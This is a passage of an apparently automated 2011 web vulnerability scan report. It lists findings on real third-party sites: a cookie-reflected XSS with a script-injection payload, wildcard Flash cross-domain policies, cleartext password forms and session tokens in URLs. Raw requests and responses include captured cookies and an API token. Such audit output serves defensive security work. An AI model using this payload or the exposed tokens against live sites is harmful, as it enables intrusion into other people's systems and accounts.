The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2054b"><script>alert(1)</script>5f8eef092a5 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1997
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b">
...[SNIP]...

2. Flash cross-domain policy
There are 5 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 08 Apr 2011 03:32:10 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 74684
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

2.2. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

2.3. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=93
Expires: Sat, 09 Apr 2011 00:17:54 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

2.4. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 08 Apr 2011 20:00:06 GMT
Expires: Sat, 09 Apr 2011 20:00:06 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 15410
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

2.5. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Content-Type: text/xml
Cache-Control: max-age=117
Expires: Sat, 09 Apr 2011 00:18:18 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://appointron.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.4.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "8879d27282002ca61af216ed66e18e8a"
X-Runtime: 1ms
Set-Cookie: _base_session=BAh7BzoMY3NyZl9pZCIlZjEzMjVhMzZlNjc0MGFkZjU1MDQyMTBiNzZhOTc5ZTQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--587a67a84dd30f49cd5d102ac1c3a7523ee2b049; domain=.appointron.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1977019555
Age: 0
Via: 1.1 varnish
Content-Length: 12153

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<td id='login_content_table_cell'>
<form action="/session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td>
<input class="noFocus" id="password" name="password" onkeypress="return submitenter(this,event)" style="font-size: 22px; width: 220px; border: 0px;" type="password" />
</td>
...[SNIP]...

3.2. http://appointron.com/users/new

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /users/new?plan_type_id=2 HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "e9d79718dce53d6411782b2bf1fdaae0"
X-Runtime: 5ms
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1233507530
Age: 0
Via: 1.1 varnish
Content-Length: 11968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<br/>
<form action="/users" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<br/>
       <input id="user_password" name="user[password]" size="30" type="password" />

       <label for="password_confirmation">
...[SNIP]...
<br/>
       <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />

<br/>
...[SNIP]...

3.3. http://wcax.upickem.net/engine/Splash.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<center><form name="frmLogin" id="frmLogin" style="display:inline;" method="post" action="splash.aspx">
<table border="0" cellspacing="3" cellpadding="0" style="width:100%;" width="border-collapse:collapse; " class="UPE-StandardTableSmaller">
...[SNIP]...
<input id="txtPasswordDisplay" class="UPE-InputText" style="vertical-align:middle;color:grey;" size="10" value="Password" onfocus="TogglePassword('enter');"><input type="password" name="txtPassword" id="txtPassword" style="vertical-align:middle;display: none;" class="UPE-InputText" size="10" maxlength="10" onblur="TogglePassword('complete');">&nbsp;&nbsp;<input type="Submit" value="Login" class="UPE-ButtonText" style="vertical-align:middle;" onclick="javascript: if (navigator.appName == 'Microsoft Internet Explorer') { if (navigator.cookieE
...[SNIP]...

3.4. http://www.vermontopia.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 12:28:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 15321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<div id="lEdirectory" class="isVisible">
               <form name="login" method="post" action="http://www.vermontopia.com/members/login.php">
                   
<input type="hidden" name="destiny" value="http://www.vermontopia.com/profile/" />
...[SNIP]...
</label>
       <input type="password" autocomplete="off" name="password" id="password" value="" />
                   <span class="automaticLogin">
...[SNIP]...

3.5. http://www.wcax.com/global/PM/registration.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/PM/registration.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /global/PM/registration.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823&referrerDomain=www.wcax.com HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352695263:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis57
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
ntCoent-Length: 36961
Expires: Sat, 09 Apr 2011 12:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:38:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: EmailAddress=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: FirstName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: UserName=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: REGISTRATION=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Set-Cookie: SuppliedProfileFields=; expires=Mon, 09-Apr-2001 12:38:22 GMT; path=/
Content-Length: 36961


<html>
<head id="Head1"><title>
   Create Account
</title><link href="mem.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="/global/interface/jq.js" type="text/javasc
...[SNIP]...
<div id="MainDiv">
<form name="form1" method="post" action="UserProfile.aspx?L=104054&amp;function=manageprofile&amp;mode=create&amp;referrer=http%3a%2f%2fwww.wcax.com%2fGlobal%2flink.asp%3fL%3d398823&amp;referrerDomain=www.wcax.com" id="form1" onsubmit="return Validate();">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkwMjU2NDE0NQ9kFgICAw9kFhACAQ8WAh4EVGV4dAXIATxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+CjwhLS0KdmF
...[SNIP]...
<br />
<input id="Password" type="password" maxLength="60" size="32" name="Password" value="" />
</td>
...[SNIP]...
<br />
<input id="VerifyPassword" type="password" maxLength="60" size="32" name="VerifyPassword" value="" />
</td>
...[SNIP]...

4. Session token in URL
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
<div id="ka_singlesignon_text">Or <a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login">log in using another provider</a>
...[SNIP]...
<div id="ka_singlesignon_image"><a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login"><img src="http://clientapps.kickapps.com/hearst/comments/images/sso_logos.png"/>
...[SNIP]...

4.2. http://nmp.newsgator.com/NGBuzz/buzz.ashx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:23:25 GMT
ETag: 634320806054306710
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: public, max-age=478
Date: Sat, 09 Apr 2011 12:29:45 GMT
Connection: close
Content-Length: 11208

try{var buzzTemplate_216931="{if LoadScript(NGBaseUrl+\"HOST/\"+OrgCode+\"/js/jquery.min.js\", \"window.jQuery != null\") }\n{if location.hostname==\"hosted.newsgator.com\"}\n{eval}\n LoadCSS(\"http:
...[SNIP]...

4.3. https://www.google.com/accounts/Captcha

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/Captcha

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

